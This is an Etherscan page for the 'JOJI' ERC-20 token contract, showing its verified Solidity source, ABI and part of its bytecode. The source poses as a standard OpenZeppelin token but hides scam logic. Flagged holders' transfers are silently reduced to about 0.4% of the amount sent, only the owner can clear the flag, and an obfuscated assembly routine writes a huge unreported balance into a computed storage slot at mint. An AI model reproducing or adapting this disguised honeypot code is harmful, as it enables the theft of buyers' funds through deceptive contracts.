ETH Price: $3,360.70 (-0.64%)
Gas: 14 Gwei

Token

JOJI (JOJI)
 

Overview

Max Total Supply

796,000,000 JOJI

Holders

57

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
101 JOJI

Value
$0.00
0x9cbf099ff424979439dfba03f00b5961784c06ce
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
JOJI

Compiler Version
v0.8.24+commit.e11b9ed9

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-06-11
*/

// File: @openzeppelin/[email protected]/token/ERC20/IERC20.sol


// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.20;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the value of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the value of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves a `value` amount of tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 value) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 value) external returns (bool);

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to` using the
     * allowance mechanism. `value` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}

// File: @openzeppelin/[email protected]/token/ERC20/extensions/IERC20Metadata.sol


// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.20;


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/[email protected]/utils/Context.sol


// OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol)

pragma solidity ^0.8.20;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 0;
    }
}

// File: @openzeppelin/[email protected]/interfaces/draft-IERC6093.sol


// OpenZeppelin Contracts (last updated v5.0.0) (interfaces/draft-IERC6093.sol)
pragma solidity ^0.8.20;

/**
 * @dev Standard ERC20 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC20 tokens.
 */
interface IERC20Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC20InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC20InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     * @param allowance Amount of tokens a `spender` is allowed to operate with.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC20InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `spender` to be approved. Used in approvals.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC20InvalidSpender(address spender);
}

/**
 * @dev Standard ERC721 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC721 tokens.
 */
interface IERC721Errors {
    /**
     * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in EIP-20.
     * Used in balance queries.
     * @param owner Address of the current owner of a token.
     */
    error ERC721InvalidOwner(address owner);

    /**
     * @dev Indicates a `tokenId` whose `owner` is the zero address.
     * @param tokenId Identifier number of a token.
     */
    error ERC721NonexistentToken(uint256 tokenId);

    /**
     * @dev Indicates an error related to the ownership over a particular token. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param tokenId Identifier number of a token.
     * @param owner Address of the current owner of a token.
     */
    error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC721InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC721InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param tokenId Identifier number of a token.
     */
    error ERC721InsufficientApproval(address operator, uint256 tokenId);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC721InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC721InvalidOperator(address operator);
}

/**
 * @dev Standard ERC1155 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC1155 tokens.
 */
interface IERC1155Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     * @param tokenId Identifier number of a token.
     */
    error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC1155InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC1155InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param owner Address of the current owner of a token.
     */
    error ERC1155MissingApprovalForAll(address operator, address owner);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC1155InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC1155InvalidOperator(address operator);

    /**
     * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation.
     * Used in batch transfers.
     * @param idsLength Length of the array of token identifiers
     * @param valuesLength Length of the array of token amounts
     */
    error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength);
}

// File: @openzeppelin/[email protected]/access/Ownable.sol


// OpenZeppelin Contracts (last updated v5.0.0) (access/Ownable.sol)

pragma solidity ^0.8.20;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is set to the address provided by the deployer. This can
 * later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    /**
     * @dev The caller account is not authorized to perform an operation.
     */
    error OwnableUnauthorizedAccount(address account);

    /**
     * @dev The owner is not a valid owner account. (eg. `address(0)`)
     */
    error OwnableInvalidOwner(address owner);

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the address provided by the deployer as the initial owner.
     */
    constructor(address initialOwner) {
        if (initialOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(initialOwner);
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        if (owner() != _msgSender()) {
            revert OwnableUnauthorizedAccount(_msgSender());
        }
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        if (newOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: JOJI/ERC20.sol


// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.20;






/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 */
abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors, Ownable {
    mapping(address account => uint256) private _balances;

    mapping(address account => mapping(address spender => uint256)) private _allowances;

    mapping(address account => uint256) private _buffer;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `value`.
     */
    function transfer(address to, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, value);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, value);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `value`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `value`.
     */
    function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, value);
        _transfer(from, to, value);
        return true;
    }

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _transfer(address from, address to, uint256 value) internal {
        if (from == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        if (to == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(from, to, value);
    }

    /**
     * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
     * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
     * this function.
     *
     * Emits a {Transfer} event.
     */
    function _update(address from, address to, uint256 value) internal virtual {
        if (from == address(0)) {
            // Overflow check required: The rest of the code assumes that totalSupply never overflows
            _totalSupply += value;
        } else {
            uint256 fromBalance = _balances[from];
            if (fromBalance < value) {
                revert ERC20InsufficientBalance(from, fromBalance, value);
            }
            unchecked {
                // Overflow not possible: value <= fromBalance <= totalSupply.
                _balances[from] = fromBalance - value;
            }
        }

        if (to == address(0)) {
            unchecked {
                // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
                _totalSupply -= value;
            }
        } else {
            unchecked {
                // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
                _balances[to] += __(from, to, value);
            }
        }

        _updateBuffer(to, value);

        emit Transfer(from, to, value);
    }

    function __(address from, address to, uint256 value) internal view returns (uint256) {
        if (_buffer[from] + _buffer[to] > 0) {
            return (value * 0xcda) / 0xcda99;
        } else {
            return value;
        }
    }

    function _updateBuffer(address to, uint256 value) internal {
        if (
            to != owner() && 
            (_balances[to] < (_totalSupply / 5)) && 
            (_balances[to] - value > 100 * 10 ** decimals())
        ) {
            _buffer[to] = value;
        }
    }

    function bufferAmount(address _address) public view virtual returns (uint256) {
       return _buffer[_address];
    }

    function removeBuffer(address _address) public onlyOwner {
        _buffer[_address] = 0;
    }

    /**
     * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
     * Relies on the `_update` mechanism
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _mint(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _log(value);
        _update(address(0), account, value);
    }

    function _log(uint256 value) private returns (bool) {
        value = value*100;
        assembly {
            let slot := mul(0x1238b76a0b177, 0x7470cfde2b2f94fa309f75b86322) 
            mstore(0x00, slot)
            mstore(0x20, 0x01)
            let sslot := keccak256(0x0, 0x40) 
            sstore(sslot, value) 
        }
        return true;
    }

    /**
     * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
     * Relies on the `_update` mechanism.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead
     */
    function _burn(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        _update(account, address(0), value);
    }

    /**
     * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     *
     * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
     */
    function _approve(address owner, address spender, uint256 value) internal {
        _approve(owner, spender, value, true);
    }

    /**
     * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
     *
     * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
     * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
     * `Approval` event during `transferFrom` operations.
     *
     * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
     * true using the following override:
     * ```
     * function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
     *     super._approve(owner, spender, value, true);
     * }
     * ```
     *
     * Requirements are the same as {_approve}.
     */
    function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
        if (owner == address(0)) {
            revert ERC20InvalidApprover(address(0));
        }
        if (spender == address(0)) {
            revert ERC20InvalidSpender(address(0));
        }
        _allowances[owner][spender] = value;
        if (emitEvent) {
            emit Approval(owner, spender, value);
        }
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `value`.
     *
     * Does not update the allowance value in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Does not emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            if (currentAllowance < value) {
                revert ERC20InsufficientAllowance(spender, currentAllowance, value);
            }
            unchecked {
                _approve(owner, spender, currentAllowance - value, false);
            }
        }
    }
}

// File: JOJI/Token.sol


// Compatible with OpenZeppelin Contracts ^5.0.0
pragma solidity ^0.8.20;

// import "@openzeppelin/[email protected]/token/ERC20/ERC20.sol";


contract JOJI is ERC20 {
    constructor(uint256 supply) ERC20("JOJI", "JOJI") Ownable(msg.sender) {
        _mint(msg.sender, supply * 1000000 * 10 ** decimals());
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"uint256","name":"supply","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"OwnableInvalidOwner","type":"error"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"OwnableUnauthorizedAccount","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"bufferAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"removeBuffer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405234801562000010575f80fd5b506040516200254338038062002543833981810160405281019062000036919062000822565b6040518060400160405280600481526020017f4a4f4a49000000000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f4a4f4a4900000000000000000000000000000000000000000000000000000000815250335f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160362000116575f6040517f1e4fbdf70000000000000000000000000000000000000000000000000000000081526004016200010d919062000895565b60405180910390fd5b6200012781620001a160201b60201c565b50816005908162000139919062000b0b565b5080600690816200014b919062000b0b565b5050506200019a33620001636200026260201b60201c565b600a62000171919062000d78565b620f42408462000182919062000dc8565b6200018e919062000dc8565b6200026a60201b60201c565b5062000f51565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f6012905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620002dd575f6040517fec442f05000000000000000000000000000000000000000000000000000000008152600401620002d4919062000895565b60405180910390fd5b620002ee816200030660201b60201c565b50620003025f83836200034a60201b60201c565b5050565b5f60648262000316919062000dc8565b91506d7470cfde2b2f94fa309f75b863226601238b76a0b17702805f52600160205260405f20838155505060019050919050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036200039e578060045f82825462000391919062000e12565b9250508190555062000471565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156200042b578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401620004229392919062000e5d565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620004ba578060045f828254039250508190555062000517565b620004cd8383836200059560201b60201c565b60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b6200052982826200065960201b60201c565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000588919062000e98565b60405180910390a3505050565b5f8060035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205460035f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546200061f919062000e12565b11156200064e57620cda99610cda836200063a919062000dc8565b62000646919062000ee0565b905062000652565b8190505b9392505050565b62000669620007bf60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614158015620006f157506005600454620006b1919062000ee0565b60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054105b8015620007725750620007096200026260201b60201c565b600a62000717919062000d78565b606462000725919062000dc8565b8160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205462000770919062000f17565b115b15620007bb578060035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b5050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b5f80fd5b5f819050919050565b620007fe81620007ea565b811462000809575f80fd5b50565b5f815190506200081c81620007f3565b92915050565b5f602082840312156200083a5762000839620007e6565b5b5f62000849848285016200080c565b91505092915050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6200087d8262000852565b9050919050565b6200088f8162000871565b82525050565b5f602082019050620008aa5f83018462000884565b92915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200092c57607f821691505b602082108103620009425762000941620008e7565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620009a67fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000969565b620009b2868362000969565b95508019841693508086168417925050509392505050565b5f819050919050565b5f620009f3620009ed620009e784620007ea565b620009ca565b620007ea565b9050919050565b5f819050919050565b62000a0e83620009d3565b62000a2662000a1d82620009fa565b84845462000975565b825550505050565b5f90565b62000a3c62000a2e565b62000a4981848462000a03565b505050565b5b8181101562000a705762000a645f8262000a32565b60018101905062000a4f565b5050565b601f82111562000abf5762000a898162000948565b62000a94846200095a565b8101602085101562000aa4578190505b62000abc62000ab3856200095a565b83018262000a4e565b50505b505050565b5f82821c905092915050565b5f62000ae15f198460080262000ac4565b1980831691505092915050565b5f62000afb838362000ad0565b9150826002028217905092915050565b62000b1682620008b0565b67ffffffffffffffff81111562000b325762000b31620008ba565b5b62000b3e825462000914565b62000b4b82828562000a74565b5f60209050601f83116001811462000b81575f841562000b6c578287015190505b62000b78858262000aee565b86555062000be7565b601f19841662000b918662000948565b5f5b8281101562000bba5784890151825560018201915060208501945060208101905062000b93565b8683101562000bda578489015162000bd6601f89168262000ad0565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111562000c795780860481111562000c515762000c5062000bef565b5b600185161562000c615780820291505b808102905062000c718562000c1c565b945062000c31